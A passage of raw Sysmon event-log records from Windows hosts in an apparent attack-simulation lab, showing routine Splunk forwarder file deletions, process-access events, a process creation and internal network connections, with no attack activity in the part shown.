Reader\FoxitSensor\Sensor.db-journalMD5=25A241C31D71BA0916B5F332FE0FBE68,SHA256=6D14FF340403E6C3902925DC9A095919B11B4E9A4A25D98475B2448A23DE0568,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.367{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B90BCF826B1CE2CDD625C7546B5AD7,SHA256=4970F7ED9B655626F69B5D8F137B10640E38D778F0B4106C7DA4040E149760B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016140Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E412-63C7-FB01-00000000B002}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016139Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016138Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016137Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016136Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016135Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016134Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016133Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016132Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016131Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016130Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E412-63C7-FB01-00000000B002}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016129Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.416{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E412-63C7-FB01-00000000B002}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016128Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.417{E5A8D418-E412-63C7-FB01-00000000B002}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000041404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.269{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:34.268{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000016143Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:35.761{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD82992A36C639C5DB764B36D1C6EE85,SHA256=B921A4C23D05896A5B3318C4C8E99917006EE85AF1080DB75B9D2624DA22C069,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:35.420{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2101C542316C12AA812624CC030A1F7,SHA256=AD1BA5AF7B36FFC50342172604DA83B1FA423E8014490AA4E38F3410CADF5A7F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016142Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:35.636{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B21F89B280D9BCFEF13ADAD87DDB3BFF,SHA256=B9162AE6887C456FB5AB4C16117ED6B0DF6F1FD34F193023D4519AB5261417C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000016145Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:34.982{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50079-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016144Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:36.854{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CB7391650FFE344534A5CDCBF21B408,SHA256=A6C144727206C3C17B128C5F335452EC6547F7D9FC863AD22CDF517C6E3EBFED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:36.507{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B83CDDB27BA38399ED4E4B1E114058BB,SHA256=05E90D6459C4B9370CFF138AA80A8483B859734FCA59A8068D56624BB61477C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016146Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:37.930{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95913C2837562DDF6ECF744813857ED8,SHA256=F20B07C4860F6FD5449691912731D0AFA96DA744813C45EDA8CBD8D1BCA4FAE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:37.602{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D8F77365B6BA6079AA9CD7CB74D68A3,SHA256=CC3B601F90B7DD6B7B37A677F3BD841E766DC5013AD2D25A8470DF3516F0EDCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:38.696{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2F558E1644B3E3DB1AC3A25CBB02F9F,SHA256=D37A0A3A2C2257D27C8E6CB729078959E5BF3FB0E642CA683941D113BE6D0C41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:39.782{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD478A32790D82F276CEAF07427075BC,SHA256=908398CD7AC54577E6BC288C04616B93383F5563CCAF90E133E5D27F1B1CA0D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016147Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:39.018{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4552178B85FC9106960CE156208DDAB0,SHA256=80834A0E53D769144CC71D3EEC65BBC0FC287F038DFC52A869B6F4EE07C2DC2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:40.855{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=421F0D895587F339767CFBF3B9A61651,SHA256=477FC66332C17AA0DC9CA71280CF5C56AEC0D12FC970D6DD0D8BE9AF39CA23FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016148Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:40.109{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B864696B579204C2E51B01ABFEB352D,SHA256=929685DBCDC672320AA8610948767EBD8EA9C9153359F8070247A02C269DEA83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:41.954{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE268849B8846CCC4122998CCAFE8C91,SHA256=E05063995759FC37430491AFE9E249FB80644A54D52C6B6E91765E8948991614,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016149Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:41.211{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A5B38246A43F4E2968165300C0251ED,SHA256=F925732045C9987C784D509FB57F2523FF9906A8FE21D50E611A5016A1B78CE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:37.672{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56280-false10.0.1.12-8000- 10341000x800000000000000016181Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.789{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016180Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.785{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000016179Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:42.781{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program 